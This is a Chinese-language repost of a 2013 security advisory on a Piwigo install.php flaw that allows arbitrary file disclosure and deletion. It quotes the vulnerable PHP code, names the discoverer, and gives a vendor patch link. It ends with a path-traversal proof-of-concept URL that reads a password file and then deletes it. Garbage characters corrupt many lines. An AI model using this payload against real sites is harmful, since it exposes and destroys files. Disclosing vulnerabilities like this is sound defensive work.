Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
/ H- O: D: q- m9 `115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
1 j- d2 M9 y- o; e1 ?9 m) N: y1 @116:   header('Cache-Control: no-cache, must-revalidate');
3 R4 ]4 r" s7 Z$ |7 I8 Y( R. _117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
: R/ R5 A) C" B) `" n) l119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
: w2 M8 S! B; f3 N121:   echo file_get_contents($filename);
! h2 V2 g) n8 S% k1 S# }122:   unlink($filename);
' a1 N/ U3 j7 g" o123:   exit();
2 o9 D2 S2 ~- J6 B! v% |( b* f124: }
====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
  O/ d- v. Y7 g4 O# E           Apache 2.4.2 (Win32)
8 K" w; z3 I2 v! k/ T$ d" i/ m8 Q% c           PHP 5.4.4
( U( }- W8 D) z  J           MySQL 5.5.25a
% a4 U2 a! D% d) ?& Q: ~* r
! ^. m, R& j  UVulnerability discovered by Gjoko 'LiquidWorm' Krstic
. _6 i3 V. o6 Z                            @zeroscience
- Q( O; g/ @9 z- a4 Z( O
Advisory ID: ZSL-2013-5127
- O5 o) g  {* y, X+ ]Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013
8 d0 R5 V. l, h2 b0 y4 @( Q, ]
- y8 q& A% k$ H8 j5 G3 A--
; z/ L- |+ R9 g8 q8 H0 p4 lhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt